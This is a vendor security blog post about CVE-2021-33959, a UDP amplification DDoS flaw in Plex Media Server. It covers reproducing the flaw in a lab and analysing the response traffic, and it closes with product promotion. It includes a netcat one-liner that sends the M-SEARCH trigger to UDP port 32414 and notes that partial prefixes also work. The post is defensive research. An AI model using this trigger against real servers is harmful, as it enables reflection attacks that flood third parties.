In the era of online streaming media, Plex Media Server is a popular versatile software application that allows its users to organize, stream and manage their personal media contents (movies, TV shows, music and photos) across multiple devices. It’s like someone’s own Netflix server which can be accessed from their personal devices like smartphones, tablets, smart tv or any other streaming devices.
However, its popularity and widespread use also make it a popular target for an attacker. One significant vulnerability, which impacts the Plex Media Server is UDP Amplification DDoS attack discovered in 2021. One CVE-2021-33959 is also assigned to this specific vulnerability.
In this blog we will take a closer look at the traffic pattern of this attack including how one can reproduce the vulnerable setup and its exploitation.
Vulnerable Setup and Exploitation
As per the information provided by MITRE, Plex Server 1.21 and below is vulnerable to the DDoS Reflection attack. So, to understand the vulnerability better, ATI team has deployed a vulnerable environment locally using the Plex Media Server of version 1.9.5.3112 (victim) as shown below –
Figure 1: Vulnerable Plex Media Server running on localhost
For the exploitation, we as an attacker are sending the payload “M-SEARCH * HTTP/1.1” to the vulnerable Plex Media Server on UDP port 32414 using the following ‘netcat’ Linux command –
echo “M-SEARCH * HTTP/1.1” | nc -u <server_ip> 32414
This triggers a UDP response from the server which is significantly larger than the original request as shown below –
Interestingly, we have also observed that it is not just that exact “M-SEARCH * HTTP/1.1” payload. An attacker can send any successive substring of the same payload starting from the beginning (as shown below) in byte string format such as “\x4d” (“M”), “\x4d\x2d” (“M-”) and so on to the same UDP port 32414, the server still responds.
This indicates that the server starts processing and responding to the incomplete/partial UDP request as shown below –
For this UDP Amplification attack the maximum Bandwidth Amplification Factor (BAF) we are getting is –
Figure 5: Calculation of BAF
Attack Traffic Analysis
From the captured network traffic we can see that the vulnerable Plex Media Server is responding with a HTTP 200 OK response inside the UDP stream as shown below –
This response contains the following headers –
- Content-Type: plex/media-server
- Name: <Name of the device from where the client has sent the UDP request>
- Port: 32400 (indicating that Plex Media Server is running on UDP port 32400)
- Resource-Identifier: <unique Lower hexadecimal string of length 20 bytes>
- Updated-At: <UNIX Epoch timestamp in integer format>
- Version: <Version of the Plex Media Server>
Plex UDP Amplification DDoS Attack Traffic in Keysight ATI
At Keysight Technologies, our Application and Threat Intelligence (ATI) team, researchers have examined the traffic pattern of Plex UDP Amplification DDoS attack and its related strike (CVE-2021-33959) and added their support as part of BreakingPoint System’s DDoS Lab and Security component in ATI-2024-24 StrikePack released on December 06, 2024, as shown below –
Leverage Subscription Service to Stay Ahead of Attacks
Keysight’s Application and Threat Intelligence subscription provides daily malware and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Centre continuously monitors threats as they appear in the wild. Customers of BreakingPoint now have access to attack campaigns for different advanced persistent threats, allowing BreakingPoint Customers to test their currently deployed security control’s ability to detect or block such attacks.